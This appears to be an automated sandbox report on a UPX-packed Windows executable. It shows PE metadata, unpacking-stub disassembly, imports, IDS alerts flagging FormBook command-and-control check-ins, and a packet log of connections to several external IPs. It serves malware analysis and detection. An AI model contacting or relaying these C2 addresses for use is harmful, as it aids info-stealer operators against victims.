                                                  Entrypoint Section:UPX1
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66E18B2A [Wed Sep 11 12:20:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                                                  Instruction
                                                  pushad
                                                  mov esi, 004E7000h
                                                  lea edi, dword ptr [esi-000E6000h]
                                                  push edi
                                                  jmp 00007F47906D5CDDh
                                                  nop
                                                  mov al, byte ptr [esi]
                                                  inc esi
                                                  mov byte ptr [edi], al
                                                  inc edi
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5CBFh
                                                  mov eax, 00000001h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc eax, eax
                                                  add ebx, ebx
                                                  jnc 00007F47906D5CDDh
                                                  jne 00007F47906D5CFAh
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5CF1h
                                                  dec eax
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc eax, eax
                                                  jmp 00007F47906D5CA6h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc ecx, ecx
                                                  jmp 00007F47906D5D24h
                                                  xor ecx, ecx
                                                  sub eax, 03h
                                                  jc 00007F47906D5CE3h
                                                  shl eax, 08h
                                                  mov al, byte ptr [esi]
                                                  inc esi
                                                  xor eax, FFFFFFFFh
                                                  je 00007F47906D5D47h
                                                  sar eax, 1
                                                  mov ebp, eax
                                                  jmp 00007F47906D5CDDh
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5C9Eh
                                                  inc ecx
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jc 00007F47906D5C90h
                                                  add ebx, ebx
                                                  jne 00007F47906D5CD9h
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  adc ecx, ecx
                                                  add ebx, ebx
                                                  jnc 00007F47906D5CC1h
                                                  jne 00007F47906D5CDBh
                                                  mov ebx, dword ptr [esi]
                                                  sub esi, FFFFFFFCh
                                                  adc ebx, ebx
                                                  jnc 00007F47906D5CB6h
                                                  add ecx, 02h
                                                  cmp ebp, FFFFFB00h
                                                  adc ecx, 02h
                                                  lea edx, dword ptr [edi+ebp]
                                                  cmp ebp, FFFFFFFCh
                                                  jbe 00007F47906D5CE0h
                                                  mov al, byte ptr [edx]
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2012 UPD4 build 61030
                                                  • [RES] VS2012 UPD4 build 61030
                                                  • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19fc90 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13c000 | 0x63c90 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a00b4 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13b274 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xe6000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xe7000 | 0x55000 | 0x54400 | d8931300f6a8181c4e7b02a48d0a652e | False | 0.9884145493323442 | data | 7.9360218924964805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13c000 | 0x65000 | 0x64200 | e7422cf2d25381b534673170c9a53a13 | False | 0.9490675717852685 | data | 7.938684954738563 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x13c5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x13c6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x13c804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x13c930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x13cc1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x13cd48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x13dbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x13e4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x13ea0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x140fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x142064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xca4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcaa84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xcb110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xcb5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xcbb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcc1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcc660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x1424d0 | 0x5d1f5 | data | | | 1.000330336707487
RT_GROUP_ICON | 0x19f6cc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x19f748 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x19f760 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x19f778 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x19f790 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | Great Britain | 0.5933734939759037
RT_MANIFEST | 0x19f8e0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | AddAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetSaveFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | socket
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-16T09:38:08.414020+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49712 | 3.33.130.190 | 80 | TCP
2024-09-16T09:38:24.846707+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49713 | 13.228.81.39 | 80 | TCP
2024-09-16T09:38:27.367662+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49714 | 13.228.81.39 | 80 | TCP
2024-09-16T09:38:29.944838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49715 | 13.228.81.39 | 80 | TCP
2024-09-16T09:38:32.474744+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49716 | 13.228.81.39 | 80 | TCP
2024-09-16T09:38:39.260384+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49717 | 66.81.203.200 | 80 | TCP
2024-09-16T09:38:41.807298+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49718 | 66.81.203.200 | 80 | TCP
2024-09-16T09:38:44.354147+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49719 | 66.81.203.200 | 80 | TCP
2024-09-16T09:39:06.757238+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49720 | 66.81.203.200 | 80 | TCP
2024-09-16T09:39:13.080520+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49721 | 103.42.108.46 | 80 | TCP
2024-09-16T09:39:15.619923+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49722 | 103.42.108.46 | 80 | TCP
2024-09-16T09:39:18.184785+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49723 | 103.42.108.46 | 80 | TCP
2024-09-16T09:39:20.746616+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49724 | 103.42.108.46 | 80 | TCP
2024-09-16T09:39:26.244471+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49725 | 3.33.130.190 | 80 | TCP
2024-09-16T09:39:29.854942+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49726 | 3.33.130.190 | 80 | TCP
2024-09-16T09:39:31.392341+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49727 | 3.33.130.190 | 80 | TCP
2024-09-16T09:39:36.928247+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49728 | 3.33.130.190 | 80 | TCP
2024-09-16T09:39:50.728486+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49729 | 199.59.243.226 | 80 | TCP
2024-09-16T09:39:53.196514+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49730 | 199.59.243.226 | 80 | TCP
2024-09-16T09:39:55.749004+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49731 | 199.59.243.226 | 80 | TCP
2024-09-16T09:39:58.290494+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49732 | 199.59.243.226 | 80 | TCP
2024-09-16T09:40:04.087002+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49733 | 162.0.239.141 | 80 | TCP
2024-09-16T09:40:07.557349+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49734 | 162.0.239.141 | 80 | TCP
2024-09-16T09:40:10.104368+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49735 | 162.0.239.141 | 80 | TCP
2024-09-16T09:40:11.717811+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49736 | 162.0.239.141 | 80 | TCP
2024-09-16T09:40:25.435088+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49737 | 84.32.84.32 | 80 | TCP
2024-09-16T09:40:27.962763+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49738 | 84.32.84.32 | 80 | TCP
2024-09-16T09:40:30.536274+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49739 | 84.32.84.32 | 80 | TCP
2024-09-16T09:40:33.098500+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49740 | 84.32.84.32 | 80 | TCP
2024-09-16T09:40:48.170963+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49741 | 154.23.176.197 | 80 | TCP
2024-09-16T09:40:50.724097+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49742 | 154.23.176.197 | 80 | TCP
2024-09-16T09:40:53.451273+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49743 | 154.23.176.197 | 80 | TCP
2024-09-16T09:40:55.803698+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49744 | 154.23.176.197 | 80 | TCP
2024-09-16T09:41:02.161582+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49745 | 62.149.128.40 | 80 | TCP
2024-09-16T09:41:04.709926+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49746 | 62.149.128.40 | 80 | TCP
2024-09-16T09:41:07.236054+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49747 | 62.149.128.40 | 80 | TCP
2024-09-16T09:41:09.876720+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49748 | 62.149.128.40 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 16, 2024 09:38:06.320981026 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:06.329853058 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:06.329972982 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:06.338335037 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:06.343966961 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:08.413790941 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:08.413806915 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:08.413816929 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:08.413826942 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:08.414020061 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:08.414052010 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:08.418979883 CEST | 49712 | 80 | 192.168.2.5 | 3.33.130.190
Sep 16, 2024 09:38:08.451050043 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.5
Sep 16, 2024 09:38:23.908423901 CEST | 49713 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:23.913543940 CEST | 80 | 49713 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:23.913698912 CEST | 49713 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:23.925378084 CEST | 49713 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:23.930509090 CEST | 80 | 49713 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:24.846539974 CEST | 80 | 49713 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:24.846569061 CEST | 80 | 49713 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:24.846707106 CEST | 49713 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:25.432359934 CEST | 49713 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:26.451301098 CEST | 49714 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:26.457676888 CEST | 80 | 49714 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:26.457786083 CEST | 49714 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:26.469443083 CEST | 49714 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:26.474380016 CEST | 80 | 49714 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:27.367500067 CEST | 80 | 49714 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:27.367526054 CEST | 80 | 49714 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:27.367661953 CEST | 49714 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:27.979161024 CEST | 49714 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:28.997421026 CEST | 49715 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:29.002356052 CEST | 80 | 49715 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:29.002496004 CEST | 49715 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:29.012908936 CEST | 49715 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:29.029897928 CEST | 80 | 49715 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:29.029913902 CEST | 80 | 49715 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:29.944726944 CEST | 80 | 49715 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:29.944751978 CEST | 80 | 49715 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:29.944838047 CEST | 49715 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:30.526240110 CEST | 49715 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:31.546960115 CEST | 49716 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:31.552186012 CEST | 80 | 49716 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:31.552289009 CEST | 49716 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:31.559880018 CEST | 49716 | 80 | 192.168.2.5 | 13.228.81.39
Sep 16, 2024 09:38:31.564745903 CEST | 80 | 49716 | 13.228.81.39 | 192.168.2.5
Sep 16, 2024 09:38:32.474405050 CEST | 80 | 49716 | 13.228.81.39 | 192.168.2.5
                                                  Sep 16, 2024 09:38:32.474641085 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:32.474744081 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:32.477287054 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:32.482129097 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:37.739150047 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.744436979 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:37.744549036 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.754627943 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.759586096 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:39.260384083 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:39.307946920 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:40.279242039 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.284393072 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:40.284497976 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.295301914 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.300209045 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:41.807297945 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:41.855881929 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.827400923 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.832251072 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.832381010 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.844691992 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.849505901 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.849659920 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:44.354146957 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:44.400095940 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:45.373991013 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.379055023 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:45.379159927 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.387876987 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.392709970 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:59.132735968 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:59.132806063 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:01.633238077 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:01.633347988 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:04.363660097 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:04.363881111 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.757117987 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:06.757237911 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.758469105 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.766808033 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:12.199665070 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.205360889 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:12.207679987 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.218713045 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.223608971 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080423117 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080441952 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080519915 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:13.729363918 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.748621941 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.753643036 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:14.753750086 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.769258976 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.774209023 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619581938 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619651079 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619923115 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:16.276484013 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.295213938 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.300097942 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:17.300437927 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.311908960 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.317514896 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:17.317660093 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.180404902 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.180795908 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.184784889 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:18.822942972 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.842127085 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.847037077 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:19.847454071 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.856473923 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.861432076 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746443987 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746486902 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746615887 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:20.749727964 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:20.754569054 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:25.782504082 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.787328959 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:25.788732052 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.803492069 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.808265924 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:26.244250059 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:26.244471073 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:27.307276011 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:27.312232018 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:28.326940060 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:28.331841946 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:28.332036018 CEST4972680192.168.2.53.33.130.190
